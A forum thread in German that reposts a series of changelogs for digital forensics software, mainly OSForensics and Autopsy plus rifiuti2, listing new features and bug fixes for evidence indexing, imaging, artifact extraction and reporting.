Fixed slow load when attempting to open a large file in the File Viewer tab

File system browser:

Added new columns for NTFS $FILE_NAME dates. Added checkbox under Tools->Options to show/hide $FILE_NAME dates. So up to 8 dates per file are now displayed. This is useful for detecting fake time stamps.

File Name Search:

Files found in file name search can now be added to a logical image (VHD) via check boxes and right click options. This provides a fast method to, for example, dump all JPG files to a logical image.

Create Index:

Updates to handle indexing Apple's APFS file system - now with support for encrypted volumes.
Bug fix - PST EMails with long headers didn't get all the text in the header indexed. This was a regression, but is now fixed
Thread status now updates more often when indexing inside containers (like Zip files). So progress is more obvious and the indexer doesn't appear to be stuck on large container files.
Improved handling for hidden $ system files, like $BadClus, $Extend when indexing.

Misc:

It is now possible to export timeline graph to a PNG image file or copy to clipboard via right click on the graph.

[close]

http://www.osforensics.com/
Titel: OSForensics 6.1.1002
Beitrag von: SiLæncer am 16 Oktober, 2018, 09:15
Changelog

Create Index Fixed bug with indexing BitLocker encrypted drive
Disk Test GUI High DPI Scaling issue fixes (when user sets Application High DPI Override)
Forensic Imaging – Logical Removed CREATE_VIRTUAL_DISK_FLAG_FULL_PHYSICAL_ALLOCATION flag when creating virtual disk file. Pre-allocating disk space may cause the system to stall especially for large disk images.
Fixed progress bar shifting backwards after a file copy is complete
Recent activity Changed file list output of Windows explorer – recent items type so it no longer overlaps the next entry
Fixed a bug where the vertical scrollbar was not refreshed correctly when switching between the file details and file list tabs
Added location of „Windows Event Log“ for windows event items retrieved from a live scan
Timeline Restored ‘Show these files’ option in right-click menu
WinPEBuilder Updated to V1.2.105, fixed issue where the build process would fail if there was a space in the Temp work directory.

[close]

http://www.osforensics.com/
Titel: OSForensics 6.1 Build 1003
Beitrag von: SiLæncer am 26 Oktober, 2018, 12:31
Changelog

Auto triage:

Fixed a crash that could occur when collecting recent activity items

Case management:

Added debug output when attempting to load a bitlocker encrypted drive
Fixed a scaling issue with the generate report dialog not displaying correctly when high DPI scaling override settings were in use

Recent activity:

Fixed a crash that could occur when collecting Opera form history
Fixed a crash that could occur when collecting USB information in windows 7 for live acquisition
Fixed a bug where filters weren't applying correctly to URL history and downloads.

Misc:

Added support for newer versions of BitLocker. XTS-AES 128 support was added. This became available in Windows 10 (build 1511)

[close]

http://www.osforensics.com/
Titel: Autopsy 4.9.1
Beitrag von: SiLæncer am 10 November, 2018, 11:00
Changelog

Bug Fixes:

Fixed possible ingest deadlock from Image Gallery database inserts.
Image Gallery does not need lock on Case DB during pre-population, which makes UI more responsive.
Other misc Image Gallery fixes.

[close]

http://www.sleuthkit.org/autopsy
Titel: OSForensics 6.1 Build 1004
Beitrag von: SiLæncer am 13 November, 2018, 12:16
Changelog

Android Artifacts:

Fixed possible crash when scrolling through messages. Message scrolling in general should be smoother.
Pictures from MMS Messages (acquired through Android Extract App) now visible in preview window of MMS
Tab.
Updated to include data from call log and contacts.

Auto Triage:

Made auto triage tooltips a bit smaller to better fit buttons on dialog

Create index:

Fixed bug for Create Index Status GUI (unable to click "Save configuration" button) with high DPI setting
Fixed support for Win10 Bitlocker encryption

Raw disk viewer:

Fixed default case drive not being displayed after switching cases

Misc:

Fixed bug where "Entry Point Not Found : The procedure entry point CancelSynchronousIo could not be located in the dynamic link library KERNEL32.dll" could be displayed on old versions of Windows (pre Vista)

[close]

http://www.osforensics.com/
Titel: OSForensics 6.1 Build 1005
Beitrag von: SiLæncer am 28 November, 2018, 09:11
Changelog

Android Artifacts:

Fixed bug with incorrectly listing call type (e.g. Incoming, Missed, etc..)
Combined/Cleaned up contacts list. Contacts with same RawContactId are combined into a single listing (previously there was one entry per email, per phone, etc)
Updated OSFExtract Android App to V1.0.1002

File Name Search:

Fixed a crash that could occur during a search if none of the file details columns were enabled

Misc:

Added some sanity checks to the customised column config file save/reload prevent situations where all the columns are hidden
Updated help file for Android Artifact and OSFExtract Android App

[close]

http://www.osforensics.com/
Titel: Autopsy 4.10.0
Beitrag von: SiLæncer am 16 Januar, 2019, 17:00
(https://s26.postimg.cc/915w3piwp/screenshot_1239.png)
Autopsy is a graphical interface to The Sleuth Kit and other analysis tools. It was designed to be an extensible platform so that it can be an end-to-end digital forensics solution that incorporates plug-in modules from both open and closed source projects. The application provides users with various analysis features and with the possibility of generating HTML or CSV reports as well.

License: GPL

Changelog

New Features:

Central Repository
Case Manager shows data source details
SSID, MAC address, IMEI, IMSI, and ICCID can be stored and correlated on
SSID, MAC address, IMEI, IMSI, and ICCID values from past cases are flagged if they are seen again in the current case.
File types can be specified when searching for common files with past cases.
Results from finding common files with past cases is now organized by case instead of by number of occurrences.
The Central Repository can now be searched for a specific value (hash, email, etc.)

The E01 Verifier ingest module was renamed to Data Source Integrity module and it will:

Calculate hashes if none exist for a non-E01 data source
Validate hashes if they are defined
MD5, SHA1, or SHA256 hash values of raw data sources can now be specified when they are added.
Added the ability for examiners to select the time zone for displaying dates.
Tesseract OCR text extraction for keyword search now supports languages other than English, if language packs are installed.
Custom headers and footers can now be added to HTML reports.
New report module to export basic file data in CASE/UCO format.
Ingest filter rules (for triage) can now specify a list of extensions (such as "jpg,jpeg,png") instead of needing to make a rule for each extension.

Image Gallery:

Refactored to ensure database was fully closed when case was closed.
No longer pre-populate DrawableDB database.
Added caching to reduce time required to insert files after analysis.

Bug Fixes:

Duplicate interesting item and EXIF metadata artifacts are no longer created when you run the modules that generate them more than once.
The Application content viewer now displays SQLite table column names even when the table is empty.
Assorted small bug fixes are included.

[close]

http://www.sleuthkit.org/autopsy
Titel: Autopsy 4.11.0
Beitrag von: SiLæncer am 29 April, 2019, 12:22
Changelog

New Features:

Adding Data:

Hashes can optionally be entered when adding a disk image data source to a case.
Acquisition details can be stored when the data source is added.

Ingest Modules:

Added support for Microsoft Edge browser (cookies, history, and bookmarks)
Added support for Safari web browser (downloads, cookies, history, and bookmarks)
Expanded Chrome browser support to include cache parsing and form/auto fill.
Expanded Firefox browser support to extract form/auto fill fields.
Parse Zone.Identifier files to identify the source of files.
Added a TSK_SOURCE artifact to downloaded files to help users trace back to where it came from.
Added support for parsing vCards (virtual cards).
Extract more information about Windows user accounts (number of logins, creation date, and last login)
Detect more operating system types, which get saved as a TSK_OS_INFO artifact.
Detect Android media cards, which gets saved as a TSK_DATA_SOURCE_USAGE artifact.

UI:

The Application content viewer now displays HTML files.
Video playback now uses gstreamer on 64-bit systems, which supports more video formats.
Pictures can be rotated and zoomed in the Application content viewer.
The Other Occurrences content viewer layout was reorganized to make viewing the data easier.
New "Data Source Summary" panel shows high-level statistics and details about the data sources in the case.
Data sources are now listed in the data sources tree in alphabetical order.
The presentation of finding common properties within a case was revised to group results in a more helpful way.

Report / Export:

Portable Cases can be created based on tagged data. These cases contain a subset of the case data and can be opened anywhere.
Users can now choose tabs or commas as the delimiter for a files report.
Case notes are included in the HTML report.

Other:

Added a new file type that allows module writers to specify a file based on its byte range.
Data sources can be analyzed and have a CASE/UCO report generated using only the command line.

Bug Fixes"

Decreased the time required to execute inter-case common properties searches of the Central Repository.
Assorted small bug fixes are included.

[close]

http://www.sleuthkit.org/autopsy
Titel: rifiuti2 0.7.0
Beitrag von: SiLæncer am 09 Mai, 2019, 17:00
(https://i.postimg.cc/bJCDmFB2/screenshot-1553.png)
Rifiuti2 analyse recycle bin files from Windows. Analysis of Windows recycle bin is usually carried out during Windows computer forensics. Rifiuti2 can extract file deletion time, original path and size of deleted files and whether the deleted files have been moved out from the recycle bin since they are trashed.

BSD License

https://abelcheung.github.io/rifiuti2/
Titel: OSForensics 7.0.1000
Beitrag von: SiLæncer am 31 Juli, 2019, 12:16
Changelog

    Platform support:
    OSF will no longer run on Windows XP systems. (But disk images from XP machines can still be investigated). If support for installing the software on a XP system is required, then V6 will need to be used.
    Add Device:
    Bitlocker volume details (eg. key protectors, encryption, etc) now displayed when adding a bitlocker-encrypted drive to case Removed "Forensics Dude" from the Add Device window. The formatting of the help text was changed to the same look as the other windows.
    Android Logical:
    Fixed issue where during logical copy, some directories were not being included.
    Android Artifact:
    Removed misleading text indicated "images" can be added to scan. Added warning if adding ".vhd" (e.g. from logical copy) that it needs to be added to device first.
    Photo artifacts were only looking at the "data\com.google.android.apps.photos\db\gph otos 0.db" (specified in Help File). But will now also do a quick scan for known image file extensions. Added notification to user to use File Name Search module for more advance viewing/search options.
    MMS extracted with OSFExtract will show recipients on the message.
    Android Copy:
    Copying to a Logical Image (VHD) will no longer require a full scan to calculate disk size. This should increase its responsiveness.
    Updated OSFExtract to V1.0.1003. Change: App will transfer "canonical_address" table from mmssms.db database file. Which contains the addresses (recipients) for MMS threads.
    Auto triage:
    Added configuration options for logical image creation
    Moved deleted files report export to a separate thread to improve responsiveness
    Moved recent activity report export to a separate thread to improve responsiveness
    Disabled hashing of signature file list to improve responsiveness
    Boot Virtual Machine
    Added ability to boot an image as a VM from OSForensics.
    Image to be booted can be read only, as the image file is never modified. Instead changes to the image are written to separate cache files.
    Images format support includes E01, Raw, Split images, VMDK, VHD, etc..
    Write cache files are now used in mounting when 'Restore existing disk state' is checked, so VM can be restarted were you left off
    Added new menu option in Workflow navigation, "Boot Virtual machine" with 3 tabs showing running machines, and associated drives.
    Added 'Boot Virtual Machine' icon to Start page
    User can select number of cores to allocate to the VM, RAM size and if networking is enabled. Default values are scaled based on system specs of host.
    Support for booting partition images by pre-pending an MBR image to the disk in the .vmdk file. (normally it is impossible to boot just a bare partition). This includes images that use with ntldr for booting (Windows XP) and bootmgr + BCD images (Vista and above). Machines with EFI System Partitions are also supported.
    VMWare 14,15 and VirtualBox 6 are supported as hypervisors
    Host machine needs to be 64bit. Guest can be 32bit or 64bit. Guest image can be Mac OS X 10.13 (High Sierra), Windows XP to Win10 and some Linux distributions.
    Preliminary support for disk with multiple bootable partitions. Added warning text when multiple O/Ses are detected on the disk. Note: Not all permutations of multi-boot O/Ss will be supported (there are too many to test). Mac and Windows on the same disk is known to be problematic.
    Added option to bypass Windows login by patching a Windows system file and setting automatic logon option in the registry. This method is fast, but it doesn't crack the password of the user. So any files encrypted with EFS are not decrypted. As patching of system files are required, not all releases of Windows are supported. The Win 10 releases from March 2019 (17763) is known to have a problem.
    There is support for selecting which user account to auto-logon into in the case where the machine has multiple accounts.
    A new version of OSFMount is included with the package. V3.0 build 1005. This allows mounting of images as (emulated) physical drives and caching of disk writes to temp files.
    Case Manager
    Fixed bug with trailing space characters allowed in case name (causing invalid Windows folder names to be created)
    Defined new hash set flag level "major" for Project VIC
    Add info dialog when adding a Bitlocker-encrypted drive to Case
    Added new case item group for virtual machines
    Added case details tab for customizing category definitions
    Fixed an annoyance, sometimes when switching cases the OSForensics GUI will lose focus and another window will be on Top.
    Fixed a bug where sometimes the status dialog window size can appear too large while generating report.
    Reporting, "Extra Information" box will export and identify $FILE_NAME timestamps for applicable items and label it as such. Note: Applies to new items added to case. Existing items in cases will not have the extra timestamps.
    Reporting, "Skip Empty" checkbox to do not include empty artifact categories in the generated reports.
    Add button for the Case Narrative (html) editor in the main Manage Case module.
    Double-clicking on virtual machine case item switches to 'Boot Virtual Machine' module and selecting the VM in the list
    When deleting a device that was the case default device the default device will now be set to the first device associated with the case or the C drive if there are no more devices.
    Removed "Results of forensics analysis" and "Executive Overview" headings from case narrative / auto triage report
    When removing categories, all case items belonging to category shall be unassigned
    Categories can now have optional "Notes" property
    Added button to manage categories, when adding/editing case items, can click on 'Category' link to manage categories
    When adding or editing case items, a new category can be entered in the Category dropdown
    Separated "Offences" list and "Categories" list. Defined a new "Categories" list that reflects more common categorization types.
    Fixed bug where downloads/attachments were not being loaded into case after OSF restart.
    Removed all options other than 'Delete' when right-clicking multiple selected items
    Fixed possible crash when sorting Case Item name
    Added missing 'Raw Disk' exports to generated report
    Create Index / Browse Index
    New Indexing feature added, Optical character recognition (OCR) for PDF files. Previously this was only done on photographic images.
    Updated indexing engine, with lots of more minor changes for handling different file types & performance.
    Added ability to skip pre-scan when creating an index
    At Step 1, have all options check-marked by default except binary executable files, which don't contain much useful text.
    Fixed bug with search being prematurely truncated when indexed 0x1A character in meta data (title, description, etc.)
    Fixed bug with substring searches applying within exact phrases
    Fixed bug with exact phrase searches spanning across page SECTIONS. This caused some exact phrase searches (containing words which occur on the page many times but not in that sequence) to take extraordinarily long.
    Fixed Check/Uncheck all buttons not affecting new file type options
    Fixed buffer overflow issues & crash bugs in Browse Index (removed unnecessary dictionary counting) and when Filtering results
    Fixed bug with filenames not being indexed for PDF files and other plugin formats
    Improved error messages when failing to launch indexer
    Fixed "Failed to add folder" bug with Create Index -> Add folder
    Fixed bugs with handling multi-partition images
    Fixed bug with Index names ending with "." which caused various failures
    Fixed indexing unallocated clusters for entire disk images
    Create Signature:
    File system cache is now cleared before creating a signature in Direct Access mode. This is important for live file systems where the content is changing while OSF is running.
    Compare Signature
    Increased number of recently selected signature comparison files (displayed in drop list when selecting a signature) from 10 to 15
    When creating a hash set from a comparison there is now the option to include all files in the comparison or just new ones
    Added a new difference type of "Attributes Modified"
    Deleted Files / File Carving
    Hashing of files will only be performed for non-empty files (0 byte files are skipped).
    Improved responsiveness by not redrawing window if not visible
    Fixed a lockup that could occur
    Added new status tab while scanning to show number of files (grouped by extension) found/recovered.
    Removed message dialog when no files are found
    Checkbox added to enable/disable extensions for file carving.
    Updated FileCarver to be threaded for better performance (by adding threading to several operations). Resulted in 2.6x faster carving on a test system.
    Added option to look within a sector for header pattern match. Enabled by default (same as previous behaviour) OSF only looks at the bytes only at the beginning of the sector.
    Added definition for HEIC/HEIF image file format to allow these types of images to be carved.
    Updated JPG file header definition to decrease number of false positive when carving.
    Added definition for SQLite files
    Added definition and extractors for Intel based Assembly Files (.asm)
    Added definition and extractors for .torrent, .nef (Nikon RAW Image), .orf (Olympus RAW Image), .arw (Sony RAW Image) and .raw (Lecia/Panasonic RAW Image) formats
    Added header definition for FUJI Raw Image Format (.raf) and Mobile Video Format (.3gp).
    List view in Status Window showing total files found is now sortable.
    Fixed issue when "Applying Filter" was not returning (stuck in loop).
    Fixed issue with double counting files with simliar header pattern.
    Drive preparation
    Fixed an open file handle from the Drive test that would prevent the data pattern write if the drive test was run first. This fixes a possible false report saying the drive was faulty, when in fact the drive was just locked
    Email Viewer:
    Fixed UI issues when minimizing and restoring windows
    ESEDB Viewer
    Changed behaviour to load all items for selected table into data buffer so we can sort columns correctly, still only displaying 1000 entries per page. Will mean a slower initial load but much faster sorting and searching.
    Columns can now be sorted by clicking on the column heading
    Added SRUDB.dat to known esedb list when opening the ESEDB viewer and fixed some date display issues for the SRUDB date / time format.
    File Name Search:
    Allow the user to enable the other four ($FILE_NAME attribute) time stamps in the File Name Search Details View.
    Added ability to create a New Preset option in the Config window. Defaults are still loaded from FileNameSearchPresets.txt file in AppData directory. User defined Presets are saved in the OSF config file, config.OSFCfg.
    Change the module icon from "disk" to "binocular" to be consistent with the main menu.
    Config, fixed bug where hash sets were not populating in the drop down selection.
    Added right-click option to show only checkmarked files.
    Added ability to include additional folders and/or exclude folders from the File Name Search.
    When switching cases, any previous search result previously performed will be cleared.
    Fixed a bug when enabling $FILE_NAMES attributes, the horizontal scroll will disappear in the List View.
    Added Right-Click menu option to "Jump to Thumbnail View" from the File Details and File List tab. And "Jump to File Details" from the Thumbnail Tab.
    Started saving column ordering, visibility and size in OSF config file
    Fixed default title not being updated when adding multiple files to case
    File Previewer/Image viewer:
    Added support for single image HEIC files
    File System Browser:
    Refreshing the current folder using the F5 now clears the file system cache and allows user to see changes to live file system.
    Fixed hidden scrollbar when minimizing/restoring the window
    Fixed vector Out of bounds crash
    Forensic Imaging:
    Create a Drive Imaging queue to allow user to add other drives to image once the first imaging job is complete.
    Forensic Copy:
    Added option to add individual files to the image list instead of just only folders.
    Improved performance of looking up duplicate paths by keeping track of hashes
    Fixed copy operation not aborting after pressing 'Stop'
    Changed source list view to owner draw for better performance
    Moved total file size calculation to a separate thread for better response
    Hash Set:
    Added new built in hash sets for: Keyloggers, VPN Software, Peer to Peer (P2P) software, Cryptocurrency
    Added feature to import folder of VIC files. "Import VIC file set" will now prompt to either "import into existing active database" or "create new database". Updated import VIC feature to ignore Category: 0 which are considered Safe files
    Added support for importing V2.0 format VIC hash set.
    Added support for importing SHA1, MediaSize, LastUpdated fields from V1.3 VIC file format
    Fixed Bug with Right Click->Export to Text file output being corrupted. (Column Indexes to the ListView were not correct).
    Fixed Bug where Right Click->View with Internal Viewer was unable to open deleted files entries.
    Fixed Bug where false positive matches were being returned. (Previous result was not being cleared).
    When quitting, OSF will remember the current active hashset & reselect that hashset on startup.
    Made error message more descriptive on import failure. Fixed bug holding hast set open after failure to import that was preventing deletion.
    Fixed a bug preventing pasting folder locations into the NSRL data set input folder when importing
    Added "Delete" option from Hash Set Viewer window (right click menu)
    Added confirmation message box when deleting a hash set
    Added a more descriptive error message when an NSRL import fails due to errors in the file contents (eg invalid product number)
    Removed warning message about selecting a non-example / new hash set when importing an NSRL hash set (a new hash set is created by default when importing a NSRL hash set)
    Added more prominent highlighting when file is in hash set to highlight Project VIC hash sets
    Improved error message when failing to open .OSFHashSet file which is read only
    NSRL hash set import, added an error message when an operating system ID doesn't exist (eg corrupt/incomplete dataset). Will now add a dummy "unknown" entry and continue to import.
    Added support for highlighting files as "PF_IN_HASHSET_MAJOR" for Category 2 files
    Changed "Look up Hash Set" dialog to not close window when user cancels look up.
    Install to USB:
    Added option to exclude password recovery dictionaries and rainbow tables from USB install
    Changed out of space error message to use MB instead of bytes
    Added option to include Hash Sets to be exported during install.
    Internal Viewer
    File Info, added text to indicate if the file does not exist at the location
    Added 'Help' link. Moved 'Capture' button and 'Alt Stream' Combo box to the left
    Added preservation of 'create' and 'access' times, when available
    Fixed contents of certain .rar files not being displayed (RAR5)
    CSVReader, fixed a possible crash opening CSV files with individual elements that contain over 512 characters (element will be truncated to 511 characters now)
    Hex View, will display file slack space in internal viewer. Can enable/disable in 'Settings'.
    Hex View, fixed bug where hex view would not load and return "Unable to open file: File access is denied" when a file failed to open the underlying disk in raw mode (to load slack space). Show Slack Space is not available for resident MFT files or files on devices not added in forensics mode within OSForensics.
    Hex View, will extract strings in file slack space if show slack is enabled.
    MemViewer:
    Added warning if trying to save memory dump to a filesystem that doesn't support the file size of the dump e.g. Over 4GB on FAT32.
    Raw Memory Dump, added progress bar and estimated time remaining.
    Updated volatility compiled executable to 2.6.1 and volatility workbench to 2.1.1000 to support new profiles for Win 10 builds 17763 and 17134
    OSFDevMgr:
    Fixed buffer overflow when calling FindFirstFile() on a group device's root directory (eg. "group_device:")
    Fixed FindFirstFile() not returning the list of subdevices for a group device's root directory (eg. "group_device:")
    Fixed a crash that could occur when a badly formed system path is passed to SplitFilePath
    Password Recovery:
    Fixed an issue where passwords from the windows credential manager were returned when running using the "scan drive" option when they are only available for the "live acquisition" option
    Made some changes so the registry reading code at this point so it is now thread safe and will work better with the auto triage.
    Started saving column ordering, visibility and size in OSF config file
    Changed LM/NT references from "(disabled)" to "(empty)"
    Added ability to add sequential decryption jobs in the Decryption & Password Recovery tab.
    40-Bit Encryption, fix for parsing output of 40-bit file.
    Windows Login Passwords, updated GUI so list views expand as the size of the main window expands.
    Enabled debug logging for run_server.exe when OSF is ran in debug mode. Log can be found in run_server.exe directory while running and then is moved to the OSF documents folder when finished.
    Fixed bug that could cause possible memory corruption issue if GPU decryption is enabled.
    Fixed bug where checked item count was not being reset if "Acquire password" was clicked again
    Prefetch Viewer:
    Added all available run times to results list and exports
    Raw disk viewer:
    Fixed incorrect GPT 'Partition name' in Data Decode window
    Added option to select where (beginning, current position, end) to jump from when jumping using bytes or sectors. (Using a negative sign will jump backwards.)
    Recent Activity – Renamed to User Activity
    User Activity:
    Addition of System Resource Usage Monitor (SRUM) database scanning, will display items from the Application Resource Usage, Network Usage, Network Connectivity and Push Notifications database tables.
    Made the user activity navigation pane with the Tree view resizable.
    Started encoding HTML special characters (eg <>&) in the HTML output for some items when exporting
    P2P, Fixed crash when running on Ubuntu drive
    Changed "Show empty activity types" checkbox to default to on so empty types are displayed
    Windows search is now using the ESEDB viewer to load the windows search database, will sometimes be slower but should be more reliable (no need to repair database using esentutl which would often crash or leave database in a dirty state still).
    Installed programs, added date collection using the InstallDate registry value when available and when not available uses the last write date of the registry entry
    No longer stopping the windows search service when the windows search optoin is selected for a live system scan
    Added new Recycle Bin activity. Will show items in the Recycle Bin (original file path/name and date deleted).
    Added the Last-Visited and Open/Save MRU's to the MRU category: NTUSER.DATSoftwareMicrosoftWindowsCurrentVersi onExplorerComDlg32LastVisitedPidlMRU and NTUSER.DATSoftwareMicrosoftWindowsCurrentVersi onExplorerComDlg32OpenSavePIDlMRU
    Added the other 7 run time stamps for Prefetch Files (for 8 total).
    Fixed bug with non-ascii characters for recent activities that use a sqlite database (mostly browser - chrome, firefox, opera - activities)
    Added Event Log Login Types description
    Added MRU Adobe Acrobat Reader DC Artifacts
    Added Office 16 and Office365 Word, Excel and Powerpoint Artifacts from desktop install
    MRU, Fixed crash when parsing Window's XP Registry files for OpenSave and LastVisit MRU
    Added subcategories for the various browser artifacts (Firefox, Chrome, Edge, IE, etc)
    Added checkmarks besides each artifact category. Users can then deselect any artifacts they don’t want without going into the config settings.
    Added +/- expand collapse for artifacts that have subcategories.
    Add subcategories for Windows Event Logs (OAlerts, System, Security, Application, etc.)
    Fixed bug where the number of checked items links was not being shown in the File List Tab.
    Added VLC artifacts for Windows and OSX/Mac
    Added Windows Media Player Last played and folders artifacts
    Opera, fixed opera version being read incorrectly for new versions of opera
    Opera, fixed bug stopping opera password data being read correctly
    Fixed an issue seen where no Chrome information could be retrieved when doing a live scan due to not being able to get the current windows user/profile/known folders
    Registry Viewer:
    Unknown value data types will be shown as hex data by default (previously the data was not displayed at all. Useful for looking at Windows Store App's settings.dat file which are special registry hive with non documented value data types).
    System Information:
    Removed "Get" from the Registry Commands.
    Get User Info (Registry), fixed an issue where user accounts could display "Account disabled" incorrectly
    Changed error message slightly when only live acquisition tasks are in selected list when a drive letter is chosen instead of live acquisition
    Added a quick search box to search the text of the current result tab.
    Added full name, description and password hint to “Get user information (Registry)” output
    Fix to process "Enter" key notification while using the Find Text Control.
    Thumbnail View:
    Items found in hash set are now entirely highlighted (not just text)
    Web Browser:
    Updated video download script to support recent changes at Youtube which broke video download feature.
    Misc:
    Consolidated Red/Green/Yellow bookmarks into single generic bookmark
    Renamed 'bookmarks' to 'tags'
    Added 'tag' icon to replace previous 'flag' icon
    Made some changes so OSF will start as the top most window (sometimes it would start in the background)
    Updated help file:
    Fixed bug with unable to access Case devices as underlying drives. This caused problems reading from Bitlocker-encrypted drives
    Added ClearFileSystemCache_direct() function to clear the file system cache (for live disks). Previously changes in the live file system where not reflected in File System Browser due to caching.
    Updated 7zip DLL
    Better reporting of SQL errors with hashset databases
    Fix for bug with scroll bars in Compare Signature and Browse Index
    New logging engine when using DEBUGMODE. Has more detail and has less overhead.
    Changed warning message to be less severe when registry SAM permissions need changing on live system (for recent activity and password recovery)

[close]

http://www.osforensics.com/
Titel: Autopsy 4.12.0
Beitrag von: SiLæncer am 06 August, 2019, 21:30
Changelog

    New Features:

    Initial logical imager feature
    Changed file type detection so that Tika does not rely only on extension.

    Communications:

    Emails are threaded
    Added Account Summary view
    Added Contacts panel to show all contacts associated with an account.
    Added Media panel to show media attachments associated with an account
    Added filter to show accounts if they involved with the most recent messages.
    Added ability to draw a box on a picture while tagging it.
    Improved speed of displaying results when a column was sorted.
    Portable cases can contain files marked as Interesting Items and be compressed.
    New “Text” viewer that consolidates previous Strings and “Indexed Text” viewers.
    New “Translation” panel with integrations for Google and Bing (credentials required)
    Added Willi Ballentin’s “Registry Hive Viewer” panel to the “Application” viewer.
    Improved HTML viewer to use style sheets and better layout.
    Added paging to all views for faster loading of large data sets.

[close]

http://www.sleuthkit.org/autopsy
Titel: OSForensics 7.0.1001
Beitrag von: SiLæncer am 13 August, 2019, 10:00
Changelog


    Create/Search Index
        Fixed file extension count at end of summary. Previously the count of files indexed, per file type, wasn't always accurate when files where found in container files, like ZIP and CHM files.
        Fixed crash bug in Create Index Log window stack corruption, when there was very long lines in the log.
        Fixed bug in "Search Index" stopping search prematurely, not returning the full set of search results for large datasets
    Create Signature
        Support for counting NTFS hard links for OSF devices using direct access. This avoids double counting of hard linked files.
    Deleted Files
        Apply Filter button will be enabled as long as MFT has been scanned even if Search was cancelled during carving (a warning message will be visible that results are incomplete).
    File viewer
        Fixed crash that could occur when rebuilding thumbnails (triggered by using an "Open file location" right click menu item in recent activity items)
    User Activity
        Rewrote export to CSV function to export data as seen in each item's list rather than trying to have each item match a preformatted output. The new CSV file will have a section for each item type with a heading row and will be separated with a blank line (eg MRU item headings, MRU items, blank line, USB item headings, usb items etc). This means a lot more data will now be exported to CSV.
        USB, Fixed parsing of Unknown USB device in registry
        USB, Added parsing of "Properties\\{83DA6326-97A6-4088-9453-A1923F573B29}" registry key to determine USB first installed, last connected, and removal times
        USB, Added parsing of Microsoft-Windows-Partition/Diagnostic.evtx event log for USB connection/disconnection events
        USB, Added parsing of archived setupapi.dev.xxxxxxxx_xxxxxx.log
        USB, Added scanning of SYSTEM\CurrentControlSet\Enum\SCSI for USB connected SCSI disks
        Added scanning for files in "Downloads" folder and scanning drive for "Zone.Identifier" alternate stream and reading the "ReferrerUrl" and "HostUrl" fields. This can help identify files that were downloaded but moved to a new folder.
        Shellbags, started processing some more item types to retrieve more information when available
        Shellbags, fixed a bug where the top level of the disk path wasn't being cleared correctly in some cases when recursively processing the ShellBagMRU leading to malformed disk path such as Desktop\A:\B\C:\ instead of Desktop\C:\
        Windows search, fixed a crash that could occur in some older versions of the windows.edb database
        Windows search, stopped directory entries from being filtered out automatically, will now be displayed in the "directory" sub type
    Misc
        Reduced program start-up time by deferring window initialization for each module to when they are first opened. OSF should launch around 3x quicker now.
        Fixed default drive not set properly on startup
        Fixed handling split image files, where the number of split file parts was > 1000 (.999 -> .1000 or .999 -> .A00). It really doesn't make sense to create split files with this many parts, but someone did it.

[close]

http://www.osforensics.com/
Titel: OSForensics 7.0.1002
Beitrag von: SiLæncer am 15 August, 2019, 12:00
Whats new:>>

    Create/Search Index
        Fixed error reporting when indexer run out of memory, max pages exceeded or max words exceeded.
    Misc
        Fixed a performance issue with direct access of hard drives / images from OSForensics. This was particularly apparent when looking up multiple results from a file search in a hash set or when creating a search index.

http://www.osforensics.com/
Titel: OSForensics 7.0.1003
Beitrag von: SiLæncer am 23 August, 2019, 19:00
Changelog

    Case Logging:

    Only the first 100 characters of the case narrative will be written to the case log entry.
    Fixed bug. If Case Logging is enabled and a new log text entry was greater than 65536 characters, it could lead to crash and/or corrupt the log file. If entry is larger than allowed, the log entry (not actual contents) will now be truncated to fit.

    Create/Search Index:

    Added feature to increase Create Index threads up to 20 maximum
    Changed default indexing threads to 4 (based on benchmark results)

    Deleted Files:

    File Carving bug fix, some non-threadsafe functions could cause a crash during file carving due to multiple threads running at the same time which has now been fixed.

    Registry Viewer:

    Fixed issue with RegViewer displaying incorrect data for "Big Data" entries (were data was over 16KB for a single key).

    User Activity:

    Added MuiCache to "Installed Programs" artifact list. NOTE: working for live acquisition only currently.
    Added new artifact type “Shim Cache”

[close]

http://www.osforensics.com/
Titel: OSForensics 7.0.1004
Beitrag von: SiLæncer am 24 September, 2019, 09:11
Changelog


    NEW Clipboard Viewer
        Added clipboard viewer to view current, historical clipboard items (where available) and pinned items
    NEW AmCache Viewer
        Added AmCache viewer
    Auto triage
        Added option to collect clipboard contents
    Boot Virtual Machine
        Fixed unable to boot disk image located on network
        Added debug logging when querying mounted disks
    Case Manager
        Added export clipboard contents to report
        Partitions encrypted with Bitlocker now shows "Bitlocker" instead of "Empty"
    Create Index
        New indexer builds, fixed thread safety bugs with DOCX, PPTX, XLSX indexing with timing issues causing occasional "cannot open file" error on files when multiple threads are in use.
    Disk Image and Filesystem Support
        Added support for the Stream Optimized sub-format for VMDK images
        Fixed possible crash when accessing invalid cache entries for for Linux EXT drives
        Added detection of sector size when reading GPT header rather than using default 512 bytes. 4K native (4Kn) sector sizes should now be detected for disk images. This resolves an issue where partition were not being detected in some E01 images. Background info: Since about 2012 most hard drives use 4K physical sectors, but nearly universally implemented 512 byte enumlation (512e). There are a tiny number of enterprise drives that are native 4K however without emulation. OSF now supports this 4Kn format.
    Deleted Files
        Fixed Crash when OSF Terminates and the background Deleted Files cache thread is still processing items.
    Prefetch Viewer (Program Artifacts)
        Renamed Prefetch Viewer on Start page to Program Artifacts and changed icon.
    Registry Viewer
        Internal viewer should now handle large LI/RI Key Types. Should help open some registry files and display previously missing keys.
        Fixed crash when decrypting Windows Passwords (Key ClassName value was incorrect)
    User Activity
        Added clipboard item collection
        Shimcache, fixed issue with Shimcache not showing details under File List tab and also when exporting to CSV, HTML, TXT.
        Added MuiCache to "Installed Programs" artifact list for non-live acq (i.e. drive images).
        Installed Programs , added programs and drivers found in AmCache.hve. (Initial support AmCache format of Windows 10 V1607 and up).
        Added right-click option to open system event viewer for event records, fixed double-click/right-click options for other activity types
        Fixed bug in MRU recent items file paths
        Support adding files from Downloads, Jump List, Recycle Bin, Shim Cache to Case
        Updates for adding items to Case and for tagging items
        Added some extra error message details if a shadow copy of a locked system file fails

[close]

http://www.osforensics.com/
Titel: OSForensics 7.0.1005
Beitrag von: SiLæncer am 10 Oktober, 2019, 12:16
Changelog

    Boot VM:

    Added option to select disk controller. If "Auto" is selected, IDE is used for Windows XP and SATA otherwise. Should improve performance for non-XP images.

    Disk Image and Filesystem Support:

    Initial support for ISO images.

    ESEDB Viewer:

    Added detection of MAPI property hex in column header. If so, display the property identifier string
    Highlight known tables and display default columns for Win 10 Mail store.vol

    Memory Viewer:

    Added checkboxes to list of processes
    Added export of checked process details to CSV & case
    Added export of list of checked process to CSV & case
    Added link displaying number of checked processes
